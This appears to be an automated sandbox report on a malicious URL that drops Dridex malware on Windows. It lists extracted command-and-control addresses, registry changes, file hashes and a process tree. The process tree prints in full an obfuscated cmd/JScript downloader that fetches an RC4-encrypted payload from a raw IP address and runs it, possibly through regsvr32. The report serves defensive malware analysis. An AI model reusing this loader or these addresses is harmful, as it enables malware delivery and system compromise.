Analysis
-
max time kernel
241s -
max time network
250s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-06-2021 13:16
Static task
static1
URLScan task
urlscan1
Sample
https://exitmagall.xyz/iduew73
Behavioral task
behavioral1
Sample
https://exitmagall.xyz/iduew73
Resource
win7v20210410
General
Malware Config
Extracted
dridex
10111
91.200.186.229:19226
91.191.172.124:13783
Signatures
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\r437f.exe cryptone C:\Users\Admin\AppData\Local\Temp\r437f.exe cryptone -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 25 2480 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
r437f.exepid process 3084 r437f.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
r437f.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA r437f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1562560078" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1596623656" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "330189368" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "330237953" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30891732" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30891732" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30891732" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{881C6950-CAC7-11EB-B2DB-5EDB842E78E7} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "330205961" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1562560078" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 672 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 672 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 672 iexplore.exe 672 iexplore.exe 1876 IEXPLORE.EXE 1876 IEXPLORE.EXE 1876 IEXPLORE.EXE 1876 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 672 wrote to memory of 1876 672 iexplore.exe IEXPLORE.EXE PID 672 wrote to memory of 1876 672 iexplore.exe IEXPLORE.EXE PID 672 wrote to memory of 1876 672 iexplore.exe IEXPLORE.EXE PID 1876 wrote to memory of 2264 1876 IEXPLORE.EXE cmd.exe PID 1876 wrote to memory of 2264 1876 IEXPLORE.EXE cmd.exe PID 1876 wrote to memory of 2264 1876 IEXPLORE.EXE cmd.exe PID 2264 wrote to memory of 2480 2264 cmd.exe wscript.exe PID 2264 wrote to memory of 2480 2264 cmd.exe wscript.exe PID 2264 wrote to memory of 2480 2264 cmd.exe wscript.exe PID 2480 wrote to memory of 3880 2480 wscript.exe cmd.exe PID 2480 wrote to memory of 3880 2480 wscript.exe cmd.exe PID 2480 wrote to memory of 3880 2480 wscript.exe cmd.exe PID 3880 wrote to memory of 3084 3880 cmd.exe r437f.exe PID 3880 wrote to memory of 3084 3880 cmd.exe r437f.exe PID 3880 wrote to memory of 3084 3880 cmd.exe r437f.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew731⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:672 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c r437f.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\r437f.exer437f.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
66e0a7c9b93a12e042f3d12e877443ba
SHA16c7d578b1c81595c64fa76c787228e7000572f6c
SHA25680a2f7ce91f8fbd0c434679d8727b702b7829082298c872cba8a3aeca4ba91b7
SHA51246fff32727988796daf825772043e2aaad9775fde03c4d00d80f92f69b3cc5e466fc94f2eb9197e2685439cbae3d845a6cbb999756533a36e4983f7a8491ebc6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
9033c21d07cc9ea27f60b54173f06b85
SHA141882568733f4c8c8db97209ff0b026f3e9e0239
SHA256a8e88ba91e3c6db2caf7dce05072e529174e9904f64dada92c8339f0c3305e12
SHA5127a590377185088ec6ee632b11004e92aa61b3f95bc47cdb88b1a11c4163ee93979d528bdd629003ab45ed41eefa73ad965bc4e83661f517456a04b42169388eb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G2YMFG32.cookieMD5
c5a202fb2149ab569a03b26eae238b58
SHA1071a2e45a0046e51272374082ce435c48caf49d7
SHA2562feff3d84a8bddbd7e91bfda1f2a9eadc8c19a467a89b18fe34eedd2727d2757
SHA51295e24b5bfc846c316b59a54c9d00a31a9ea943f9b669969ae5e8bf6bc345db0a49dbd55c0d07ae9208b6714bc91b7c030bb5c3c44602f69924e5b371aee79ad3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\U41AKJKH.cookieMD5
67c344ac5ab2b6ad7c8139840fcf26b2
SHA14ebb71891042ca2691a53fc5be26c09e3d9be412
SHA256c91f041fdf2fb13e781d06f975b5110f9059de92b0d0e0eee6f838ce02d2eb2e
SHA51241d355f39f503b78a852d044b809694d64b24e9b1bb385403e23b11ba72cff285e763c2739fdb1054b6e9a3e0d338330bd768b35dbbb3b0f16c32358c8c61164
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\r437f.exeMD5
4ec7ddfd82f4a621daade04123f4fda7
SHA1dd7fa496a792e5efa4c96cc26aa5d6b2f7fda5b6
SHA256ad8de0ffe7a79bd5a1bb949080ac4a20951944683b66ccf0547cca7dee96824c
SHA5122124645a7e7aff5ad55315e17b99fdd9cdd3f239aba19aaa54c5547e099da9fe4090067620d2b5abcc17634d09b9754b02ddff700c22c5cb96451c243507cf56
-
C:\Users\Admin\AppData\Local\Temp\r437f.exeMD5
4ec7ddfd82f4a621daade04123f4fda7
SHA1dd7fa496a792e5efa4c96cc26aa5d6b2f7fda5b6
SHA256ad8de0ffe7a79bd5a1bb949080ac4a20951944683b66ccf0547cca7dee96824c
SHA5122124645a7e7aff5ad55315e17b99fdd9cdd3f239aba19aaa54c5547e099da9fe4090067620d2b5abcc17634d09b9754b02ddff700c22c5cb96451c243507cf56
-
memory/672-114-0x00007FF8E4290000-0x00007FF8E42FB000-memory.dmpFilesize
428KB
-
memory/1876-115-0x0000000000000000-mapping.dmp
-
memory/2264-116-0x0000000000000000-mapping.dmp
-
memory/2480-117-0x0000000000000000-mapping.dmp
-
memory/3084-120-0x0000000000000000-mapping.dmp
-
memory/3084-124-0x0000000000400000-0x0000000000595000-memory.dmpFilesize
1.6MB
-
memory/3084-123-0x00000000006D0000-0x000000000081A000-memory.dmpFilesize
1.3MB
-
memory/3880-119-0x0000000000000000-mapping.dmp